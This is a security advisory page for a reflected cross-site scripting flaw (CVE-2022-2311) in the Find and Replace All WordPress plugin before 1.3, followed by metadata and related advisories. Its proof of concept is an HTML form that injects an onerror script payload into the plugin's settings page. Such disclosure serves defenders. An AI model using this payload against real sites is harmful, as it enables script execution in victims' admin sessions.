Find and Replace All < 1.3 – Reflected Cross Site Scripting | CVE 2022-2311 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape some parameters from its setting page before outputting them back to the user, leading to a Reflected Cross-Site Scripting issue.

Proof of Concept

<html>
<body>
<form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST">
<input type="hidden" name="findstr" value="Doing XSS Test here" />
<input type="hidden" name="replacestr" value="tested"/><img src=x onerror=alert(document.domain);//">
<input type="hidden" name="submit" value="Replace Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugins

find-and-replace-all

Fixed in 1.3

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Vinay Varma Mudunuri, Krishna Harsha Kondaveeti

Submitter

Vinay Varma Mudunuri

Verified

Yes

WPVDB ID

287a14dc-d1fc-481d-84af-7eb172dc68c9

Timeline

Publicly Published

2022-11-03 (about 1 years ago)

Added

2022-11-03 (about 1 years ago)

Last Updated

2022-11-03 (about 1 years ago)

Other

Published

Title

Published

2023-03-28

Title

Full Width Banner Slider Wp <= 1.1.7 - Reflected XSS

Published

2023-11-13

Title

AMP+ Plus <= 3.0 - Reflected Cross Site Scripting

Published

2021-04-16

Title

All 404 Redirect to Homepage < 1.21 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2024-04-16

Title

Navigation menu as Dropdown Widget < 1.3.5 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2024-04-05

Title

MM-email2image <= 0.2.5 - Contributor+ Stored XSS